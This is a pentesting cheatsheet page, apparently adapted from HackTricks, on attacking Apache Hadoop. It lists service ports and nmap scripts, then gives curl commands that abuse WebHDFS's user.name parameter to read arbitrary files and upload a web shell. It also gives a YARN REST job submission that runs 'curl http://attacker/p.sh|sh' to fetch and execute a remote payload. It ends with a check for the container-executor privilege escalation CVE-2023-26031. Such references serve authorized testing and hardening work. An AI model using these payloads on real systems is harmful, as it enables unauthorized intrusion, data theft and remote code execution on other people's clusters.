daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

50030-50060-50070-50075-50090-pentesting-hadoop.md (5394B)


      1 ---
      2 title: "50030-50060-50070-50075-50090 - Pentesting Hadoop"
      3 section: "Network Services"
      4 sectionSlug: "network-services-pentesting"
      5 sourcePath: "src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # 50030-50060-50070-50075-50090 - Pentesting Hadoop
     14 
     15 ## **Basic Information**
     16 
     17 **Apache Hadoop** is an **open-source framework** for **distributed storage and processing** of **large datasets** across **computer clusters**. It uses **HDFS** for storage and **MapReduce** for processing.
     18 
     19 Useful default and historical web/RPC ports include the following; verify them in the target's Hadoop version and configuration:<sup>[[3]](#references)</sup>
     20 
     21 - **50070 / 9870** NameNode (WebHDFS)
     22 - **50075 / 9864** DataNode
     23 - **50090** Secondary NameNode
     24 - **8088** YARN ResourceManager web UI & REST
     25 - **8042** YARN NodeManager
     26 - **8031/8032** YARN RPC (often forgotten and still unauth in many installs)
     27 
     28 Nmap includes the following scripts for enumerating legacy Hadoop services:<sup>[[4]](#references)</sup>
     29 
     30 - **`hadoop-jobtracker-info (Port 50030)`**
     31 - **`hadoop-tasktracker-info (Port 50060)`**
     32 - **`hadoop-namenode-info (Port 50070)`**
     33 - **`hadoop-datanode-info (Port 50075)`**
     34 - **`hadoop-secondary-namenode-info (Port 50090)`**
     35 
     36 Hadoop's `simple` authentication mode trusts the asserted operating-system or `user.name` identity and is unsafe on an untrusted network. Secure mode uses Kerberos for HDFS, YARN, and MapReduce. Authorization, network exposure, and service-specific ACLs still determine impact, so do not treat every default installation as universally unauthenticated.<sup>[[5]](#references)</sup>
     37 
     38 ## WebHDFS / HttpFS abuse (50070/9870 or 14000)
     39 
     40 With `simple`/pseudo authentication, WebHDFS accepts a `user.name` query parameter. Subject to HDFS permissions and proxy-user settings, this can let a remote client assert an arbitrary user. Some quick primitives are:<sup>[[6]](#references)</sup>
     41 
     42 ```bash
     43 # list root directory
     44 curl "http://<host>:50070/webhdfs/v1/?op=LISTSTATUS&user.name=hdfs"
     45 
     46 # read arbitrary file from HDFS
     47 curl -L "http://<host>:50070/webhdfs/v1/etc/hadoop/core-site.xml?op=OPEN&user.name=hdfs"
     48 
     49 # upload a web shell / binary
     50 curl -X PUT -T ./payload "http://<host>:50070/webhdfs/v1/tmp/payload?op=CREATE&overwrite=true&user.name=hdfs" -H 'Content-Type: application/octet-stream'
     51 ```
     52 
     53 If HttpFS is enabled (default port **14000**) the same REST paths apply. Behind Kerberos you can still use `curl --negotiate -u :` with a valid ticket.
     54 
     55 ## YARN unauth RCE (8088)
     56 
     57 In insecure `simple` mode, an exposed ResourceManager REST API may accept application submissions as the unauthenticated pseudo-user (often `dr.who`). Whether the JSON below launches a useful command depends on the application submission context, queue ACLs, and cluster configuration.<sup>[[7]](#references)</sup>
     58 
     59 ```bash
     60 # 1) get an application id
     61 curl -s -X POST http://<host>:8088/ws/v1/cluster/apps/new-application
     62 
     63 # 2) submit DistributedShell pointing to a command
     64 curl -s -X POST http://<host>:8088/ws/v1/cluster/apps \
     65   -H 'Content-Type: application/json' \
     66   -d '{
     67     "application-id":"application_1234567890000_0001",
     68     "application-name":"pwn",
     69     "am-container-spec":{
     70       "commands":{"command":"/bin/bash -c \"curl http://attacker/p.sh|sh\""}
     71     },
     72     "application-type":"YARN"
     73   }'
     74 ```
     75 
     76 If port **8031/8032 RPC** is exposed, older clusters allow the same job submission over protobuf without auth (documented in several cryptominer campaigns) – treat those ports as RCE as well.
     77 
     78 ## Local PrivEsc from YARN containers (CVE-2023-26031)
     79 
     80 Hadoop 3.3.1–3.3.4 **container-executor** loads libs from a **relative RUNPATH**. A user who can run YARN containers (including remote submitters on insecure clusters) may drop a malicious `libcrypto.so` in a writable path and get **root** when `container-executor` runs with SUID.<sup>[[1]](#references)</sup><sup>[[2]](#references)</sup>
     81 
     82 Quick check:
     83 
     84 ```bash
     85 readelf -d /opt/hadoop/bin/container-executor | grep 'RUNPATH\|RPATH'
     86 # vulnerable if it contains $ORIGIN/:../lib/native/
     87 ls -l /opt/hadoop/bin/container-executor   # SUID+root makes it exploitable
     88 ```
     89 
     90 Fixed in **3.3.5**; ensure the binary is not SUID if secure containers aren’t required.
     91 
     92 ## References
     93 
     94 - [1] [Apache Hadoop official CVE list](https://hadoop.apache.org/cve_list.html)
     95 - [2] [Wiz write-up on CVE-2023-26031](https://www.wiz.io/vulnerability-database/cve/cve-2023-26031)
     96 - [3] [Apache Hadoop - Cluster setup and service ports](https://hadoop.apache.org/docs/stable/hadoop-project-dist/hadoop-common/ClusterSetup.html)
     97 - [4] [Nmap NSE - `hadoop-jobtracker-info`](https://nmap.org/nsedoc/scripts/hadoop-jobtracker-info.html)
     98 - [5] [Apache Hadoop - Secure Mode](https://hadoop.apache.org/docs/stable/hadoop-project-dist/hadoop-common/SecureMode.html)
     99 - [6] [Apache Hadoop - WebHDFS REST API](https://hadoop.apache.org/docs/stable/hadoop-project-dist/hadoop-hdfs/WebHDFS.html)
    100 - [7] [Apache Hadoop YARN - ResourceManager REST APIs](https://hadoop.apache.org/docs/stable/hadoop-yarn/hadoop-yarn-site/ResourceManagerRest.html)